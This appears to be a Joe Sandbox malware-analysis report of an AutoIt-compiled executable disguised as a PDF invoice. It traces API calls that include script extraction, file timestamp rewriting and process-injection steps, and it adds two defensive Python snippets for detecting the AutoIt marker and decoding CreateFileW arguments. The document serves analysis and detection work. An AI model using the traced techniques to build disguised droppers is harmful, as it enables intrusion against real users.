                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                      • _memset.LIBCMT ref: 0075418D
                                                                                                                      • _wcscpy.LIBCMT ref: 007541E1
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007541F1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                      • String ID: Line:
                                                                                                                      • API String ID: 3942752672-1585850449
                                                                                                                      • Opcode ID: b372e05205f2015c37ecd567e51c8383233eea10a4c42684d62a6ac2f22e1061
                                                                                                                      • Instruction ID: 10222e01a4b7993ba6ccb92c8497b136eaa1d56cb9eb5c63f38d7e609f8983ff
                                                                                                                      • Opcode Fuzzy Hash: b372e05205f2015c37ecd567e51c8383233eea10a4c42684d62a6ac2f22e1061
                                                                                                                      • Instruction Fuzzy Hash: 3631C1714083089AD725EB60EC4ABDB77ECBF44305F10851AF995920A1EBBC9A9CC796

                                                                                                                      Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
• Instruction ID: f0476e0d1d8db384f5ec03ac899d67bba93a2be0b01370cfb3e3afbc7d5d5b12
• Instruction Fuzzy Hash: D151B330B00B09DBDF289F79C88466E77A5AF407A0F64C729F82DD62D0D7B89D518B90
APIs
  • Part of subcall function 00754F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754F6F
• _free.LIBCMT ref: 0078E68C
• _free.LIBCMT ref: 0078E6D3
  • Part of subcall function 00756BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756D0D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 2861923089-1757145024
• Opcode ID: f2c5222a039b327897731e7ec52f04b0c7f9a9918dcfd20fd74b9eb79ba2bff3
• Instruction ID: 539f0abec368e4b76dc02074a3398c7bb3077f6824d03b0a05cbb832e727b03e
• Instruction Fuzzy Hash: F0918071A10219EFCF04EFA4CC959EDB7B4FF15314F14446AF815AB291EB78A905CB60
APIs
  • Part of subcall function 007703A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007703D3
  • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 007703DB
  • Part of subcall function 007703A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007703E6
  • Part of subcall function 007703A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007703F1
  • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 007703F9
  • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00770401
  • Part of subcall function 00766259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0075FA90), ref: 007662B4
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0075FB2D
• OleInitialize.OLE32(00000000), ref: 0075FBAA
• CloseHandle.KERNEL32(00000000), ref: 007949F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: %~
• API String ID: 1986988660-3145668672
• Opcode ID: cb7180ca1cca4ddfb09a8255270af7219e369fedfa636ab692c50ed58ff0119e
• Instruction ID: 3bc38c4299a827862249cd09fe03372ef9a6c97d90c8db34e13af8822d53189a
• Instruction Fuzzy Hash: 8081C8B0902240CEC784DF69A8496D57BEDFF88318310C67AD49AC73A2FB794468CF58
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007535A1,SwapMouseButtons,00000004,?), ref: 007535D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 007535F5
• RegCloseKey.KERNELBASE(00000000,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 00753617
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: ff5e4892d441396625fe2ff81a9305b53728ce35e7f3b6e3d8e4f694733d2347
• Instruction ID: 133d447f1ac2657b5012535708b880ca1f613b3c0b8a83b51fecbc0a5784075f
• Instruction Fuzzy Hash: D5115A71511208BFDB208F64DC40EEEB7B8EF04781F00846AF805D7220E2B69F5497A4
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 018D1A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018D1AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018D1B13
Memory Dump Source
• Source File: 00000000.00000002.1673001125.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_18d0000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
• Instruction ID: 2b70ebb52905e421d0c8a5b02d1fe4873b233099d2eda58ada81960677520ed4
• Instruction Fuzzy Hash: E5620A30A14258DBEB24DFA4C854BDEB772EF58700F1091A9D20DEB390E7799E81CB59
APIs
  • Part of subcall function 00755045: _fseek.LIBCMT ref: 0075505D
  • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AAE
  • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AC1
• _free.LIBCMT ref: 007B992C
• _free.LIBCMT ref: 007B9933
• _free.LIBCMT ref: 007B999E
  • Part of subcall function 00772F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00779C64), ref: 00772FA9
  • Part of subcall function 00772F95: GetLastError.KERNEL32(00000000,?,00779C64), ref: 00772FBB
• _free.LIBCMT ref: 007B99A6
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
• Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
• Instruction ID: 796aeca3e29dba7aa5884e4efe00fd3cac3c3a9dbf4f2725bd40ae4078f0b151
• Instruction Fuzzy Hash: 7A515DB1904258EFDF249F64CC45ADEBBB9EF48300F1044AEF659A7281DB755A80CF58
APIs
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
• Instruction ID: 4bc78bf27f2afb397134274d7043d027d0c0b093fb8a1b4db6a4d5dc839b2eb8
• Instruction Fuzzy Hash: BE41C571740705ABDF288E69C88496F77A9EF803E0B24C57DE95D87640E778ED408B44
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• API ID: _memmove
• String ID: AU3!P/~$EA06
• API String ID: 4104443479-1801474073
• Opcode ID: eb3d0f09e1feb4dfca09f75853281cb80e40027f7897928db03b3a2c469b97c1
• Instruction ID: 66ca4c0ec9a4611e91b6af490d41243356a733192373cb7dea6974bb61f5525b
                                                                                                                      • Opcode Fuzzy Hash: eb3d0f09e1feb4dfca09f75853281cb80e40027f7897928db03b3a2c469b97c1
                                                                                                                      • Instruction Fuzzy Hash: 90416C32A041949BDF215B64CC677FE7FA5AF0130AF584065EC869A2C2C5ED8DCC83A1
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0078EE62
                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0078EEAC
                                                                                                                        • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                                                                                                                        • Part of subcall function 007709D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007709F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 3777226403-3081909835
                                                                                                                      • Opcode ID: ba0d662d176931f3ca38e98ab59809276006b04a9bd98cd1804ae34cd81af6bc
                                                                                                                      • Instruction ID: 7c14bfb19ffaf51933c340d614a8bc29c9d7ecf3d7dcedc22496a928f7014505
                                                                                                                      • Opcode Fuzzy Hash: ba0d662d176931f3ca38e98ab59809276006b04a9bd98cd1804ae34cd81af6bc
                                                                                                                      • Instruction Fuzzy Hash: FB219271A002989BDB459B94D849BEE7BF8AF49315F00801AE948E7281DBF8598DCB91
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock_memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 1988441806-3962188686
                                                                                                                      • Opcode ID: 718c693b5f9169a48f42dc08829addb75543d674ccd67bdaf7d670ab1e3337c1
                                                                                                                      • Instruction ID: f3d6004d4ecc7e463d1a6ee4242eed9f3ead08c1dc74d2dbe8bc22abb264390f
                                                                                                                      • Opcode Fuzzy Hash: 718c693b5f9169a48f42dc08829addb75543d674ccd67bdaf7d670ab1e3337c1
                                                                                                                      • Instruction Fuzzy Hash: B5019671904258AEDB28D7A8C85ABEE7BF8DB15301F00859AE656D2181E5B9A6048760
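                                                                                                                       The two records above attribute the strings "AU3!" and "EA06" to the functions that memmove/fread the embedded script, which is the evidence behind the "compiled AutoIt script" signature. The following is an added example (not Joe Sandbox code and not part of the sample) that lets an analyst confirm this offline on the file or on a memory dump: it searches for the concatenated ASCII marker "AU3!EA06" and checks whether the 16-byte header that precedes it in compiled AutoIt v3 resources is present. The header bytes are an assumption taken from public AutoIt detection rules; they are not shown on this page. The sample blob is constructed for the demonstration.

```python
"""Locate the compiled-AutoIt (AU3) script marker in a file or memory dump."""
from typing import Dict, Optional

# Marker strings named in the report's String IDs above ("AU3!" and "EA06").
AU3_MARKER = b"AU3!EA06"
# 16-byte header that precedes the marker in a compiled AutoIt v3 resource.
# Assumption: taken from public AutoIt detection rules, not from this page.
AU3_HEADER = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")


def find_au3_marker(data: bytes) -> Optional[Dict[str, object]]:
    """Return offset details for the first AU3!EA06 marker, or None if absent.

    header_present is False when the marker is found but the 16-byte header
    does not immediately precede it (for instance, a string carved from a
    memory dump rather than the intact resource).
    """
    idx = data.find(AU3_MARKER)
    if idx < 0:
        return None
    hdr_len = len(AU3_HEADER)
    header_ok = idx >= hdr_len and data[idx - hdr_len:idx] == AU3_HEADER
    return {
        "marker_offset": idx,
        "header_present": header_ok,
        "script_version": AU3_MARKER[4:].decode("ascii"),  # "EA06"
        "body_offset": idx + len(AU3_MARKER),  # where the script body starts
    }


def scan_path(path: str) -> Optional[Dict[str, object]]:
    """Convenience wrapper: scan a file on disk (the sample or a .sdmp dump)."""
    with open(path, "rb") as fh:
        return find_au3_marker(fh.read())


# Constructed sample (not the real binary): a stub PE-like prefix followed by
# an overlay carrying the header and marker.
SAMPLE = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 32
    + AU3_HEADER + AU3_MARKER + b"\xAB" * 16
)

if __name__ == "__main__":
    print(find_au3_marker(SAMPLE))
```

Run `scan_path()` against the submitted executable and against the memory dump listed as Source File above; a hit in the dump without the header is still meaningful, since the sandbox's own String IDs were recovered from memory.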
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 007B9B82
                                                                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007B9B99
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                      • String ID: aut
                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                      • Opcode ID: 060e5463cd69482f800d517db648ea7394afb14f003e869021e212030c755142
                                                                                                                      • Instruction ID: 49fd0c968475d0075aa56b949f5e8a51e39a2aed699ced8ae587441542ee3ba2
                                                                                                                      • Opcode Fuzzy Hash: 060e5463cd69482f800d517db648ea7394afb14f003e869021e212030c755142
                                                                                                                      • Instruction Fuzzy Hash: 93D05E7954130DABDB60AB90DC0EF9A773CF704700F0082A2FE65D11A1DEB865988B99
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a9a48b366fdb3534b659ec4f69353e95d34beb7cbb69799a9d21069289ec451
                                                                                                                      • Instruction ID: d99be66d428c91cebc975c308a1c8eab63c2826c2fddf02a802750a1775c3b4c
                                                                                                                      • Opcode Fuzzy Hash: 1a9a48b366fdb3534b659ec4f69353e95d34beb7cbb69799a9d21069289ec451
                                                                                                                      • Instruction Fuzzy Hash: BBF11671608305DFCB24DF28C484A6ABBE5BF88314F14892EF89A9B251D775ED45CF82
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00754401
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007544A6
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007544C3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_$_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1505330794-0
                                                                                                                      • Opcode ID: 6f91ddc0e08d620adfebf211ff9fc8ccff6498a4e4b55ccab5da65a16810a297
                                                                                                                      • Instruction ID: ee4735bc3dc9e65beef0d3021d4126705b480647b39e67d05511d9ae29cb0c4d
                                                                                                                      • Opcode Fuzzy Hash: 6f91ddc0e08d620adfebf211ff9fc8ccff6498a4e4b55ccab5da65a16810a297
                                                                                                                      • Instruction Fuzzy Hash: 3F3150705057419FD720DF64D884BDBBBF8BB48309F00492EE99A83251E7B96988CB92
                                                                                                                      APIs
                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00775963
                                                                                                                        • Part of subcall function 0077A3AB: __NMSG_WRITE.LIBCMT ref: 0077A3D2
                                                                                                                        • Part of subcall function 0077A3AB: __NMSG_WRITE.LIBCMT ref: 0077A3DC
                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 0077596A
                                                                                                                        • Part of subcall function 0077A408: GetModuleFileNameW.KERNEL32(00000000,008143BA,00000104,?,00000001,00000000), ref: 0077A49A
                                                                                                                        • Part of subcall function 0077A408: ___crtMessageBoxW.LIBCMT ref: 0077A548
                                                                                                                        • Part of subcall function 007732DF: ___crtCorExitProcess.LIBCMT ref: 007732E5
                                                                                                                        • Part of subcall function 007732DF: ExitProcess.KERNEL32 ref: 007732EE
                                                                                                                        • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                                                                                                                      • RtlAllocateHeap.NTDLL(018F0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1372826849-0
                                                                                                                      • Opcode ID: 2561a4b6d56e2452bedc5e30313994bece53bff15843115ae8b5408d757b330a
                                                                                                                      • Instruction ID: e9b7bae599daa65208a9d3d7e3e1e866ab85026df09d1a90e419a76f8fc80e96
                                                                                                                      • Opcode Fuzzy Hash: 2561a4b6d56e2452bedc5e30313994bece53bff15843115ae8b5408d757b330a
                                                                                                                      • Instruction Fuzzy Hash: 8C01D631341B15EEEE212B34D84966E72489F427F0F10C136F60D9B1C1DEBDAD014A61
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007B97D2,?,?,?,?,?,00000004), ref: 007B9B45
                                                                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007B9B5B
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,007B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B9B62
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3397143404-0
                                                                                                                      • Opcode ID: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                                                                                                                      • Instruction ID: 230612e940626c119abb87b8ce971df7adb26fe81a4694d47f44c617cd103778
                                                                                                                      • Opcode Fuzzy Hash: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                                                                                                                      • Instruction Fuzzy Hash: 3EE08632181228B7D7211B54EC09FCA7F28AB05761F148121FB25A90E087B62611979C
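                                                                                                                       The record above shows CreateFileW called with raw hexadecimal arguments, followed by SetFileTime and CloseHandle. The numeric arguments are easy to misread (00000003 is OPEN_EXISTING, not CREATE_ALWAYS), and the combination "open an existing file for write, set its timestamps, close it" is what an analyst needs to recognise when triaging this function. The following is an added example (not Joe Sandbox code) that parses a call line in the report's own "Api.Module(args), ref: addr" format and decodes the CreateFileW access, share, disposition and flag constants. The constant values are the documented Win32 values; the decoder only handles CreateFileW and only the bits listed in its tables, reporting anything else as a raw hex remainder.

```python
"""Decode CreateFileW argument constants from a Joe Sandbox API call line."""
import re
from typing import Dict, List, Optional

# Documented Win32 constants (winnt.h / fileapi.h).
ACCESS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {
    1: "CREATE_NEW",
    2: "CREATE_ALWAYS",
    3: "OPEN_EXISTING",
    4: "OPEN_ALWAYS",
    5: "TRUNCATE_EXISTING",
}
FLAGS = {
    0x00000001: "FILE_ATTRIBUTE_READONLY",
    0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000080: "FILE_ATTRIBUTE_NORMAL",
    0x00000100: "FILE_ATTRIBUTE_TEMPORARY",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}

# Matches the report's "Api.Module(arg,arg,...)" call notation.
CALL_RE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\)")


def _bits(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bitmask into names; unknown bits are kept as a hex remainder."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known
    if leftover:
        names.append(f"0x{leftover:08X}")
    return names


def parse_args(args: str) -> List[Optional[int]]:
    """Turn 'a,b,?,c' into ints; '?' (unresolved by the sandbox) becomes None."""
    out: List[Optional[int]] = []
    for raw in args.split(","):
        raw = raw.strip()
        out.append(None if raw in ("", "?") else int(raw, 16))
    return out


def decode_createfile(line: str) -> Dict[str, object]:
    """Decode the CreateFileW constants from one report line."""
    match = CALL_RE.search(line)
    if not match or match.group("api") != "CreateFileW":
        raise ValueError("not a CreateFileW call line")
    args = parse_args(match.group("args"))
    if len(args) < 7:
        raise ValueError("CreateFileW needs seven arguments")
    access, share, _security, disposition, flags = args[1:6]
    return {
        "module": match.group("module"),
        "access": _bits(access or 0, ACCESS),
        "share": _bits(share or 0, SHARE),
        "disposition": DISPOSITION.get(disposition, f"0x{(disposition or 0):X}"),
        "flags": _bits(flags or 0, FLAGS),
    }


# The CreateFileW line from the record above, copied verbatim.
REPORT_LINE = (
    "CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,"
    "00000000,?,?,007B97D2,?,?,?,?,?,00000004), ref: 007B9B45"
)

if __name__ == "__main__":
    print(decode_createfile(REPORT_LINE))
```

For the line in this record the decoder yields GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING and FILE_ATTRIBUTE_NORMAL: the file already exists and is opened only to have its timestamps rewritten by the SetFileTime call that follows.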
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 007B8FA5
                                                                                                                        • Part of subcall function 00772F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00779C64), ref: 00772FA9
                                                                                                                        • Part of subcall function 00772F95: GetLastError.KERNEL32(00000000,?,00779C64), ref: 00772FBB
                                                                                                                      • _free.LIBCMT ref: 007B8FB6
                                                                                                                      • _free.LIBCMT ref: 007B8FC8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
